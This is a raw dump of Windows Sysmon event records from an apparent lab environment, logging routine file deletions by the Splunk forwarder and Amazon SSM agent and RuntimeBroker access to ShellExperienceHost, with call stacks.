23542300x800000000000000046481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:59.729{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1DCCE5A8EA5351371F9DCE8B2F0EADF,SHA256=7D460492FBE259BFDAC11EA1A1B0BDCD35A33D3313E470F8B4480B1B2711FD5A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018672Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:59.206{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C86EFCF7F97A48BF1DAE62724593F3D3,SHA256=2F7596487288112D5C473612D854660CF920F7B99599835641318DA538C3161A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:59.404{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-051MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:00.923{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=939FA5DF9000EE6185EA97AF696C6EF2,SHA256=7B22B1B399595821C8AA0276E6FD3E8FD744AD4875C93866EBCCC468670366A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018673Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:00.306{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8415FE92F4C4373CCC6D2350DF8C54C,SHA256=53239E634FB775F86755BDB4CFCA798761572146C9AD990DC4040132E8E55167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018675Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:01.384{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=437564A3B9F16CD54A53CE624FB583D6,SHA256=C8CD4FF39E4269B396CB8A29888DC664A747548DECFA1458CD800E858B7BA765,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.753{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A534E88577C76C6346663C802EBA44CC,SHA256=A72EF8423A61D946CE3BCA3B29681BECE7B9C140E3E155C6279477E7E5976540,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.471{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.471{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.471{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.471{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.471{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.471{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.471{FE4C2B44-DDF7-63C7-B204-00000000AF02}48485736C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 10341000x800000000000000046537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.471{FE4C2B44-DDF7-63C7-B204-00000000AF02}48483128C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 10341000x800000000000000046536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.456{FE4C2B44-DDF7-63C7-B204-00000000AF02}48483128C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 10341000x800000000000000046535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.456{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.456{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.456{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486520C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 10341000x800000000000000046532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.456{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.456{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.456{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.456{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 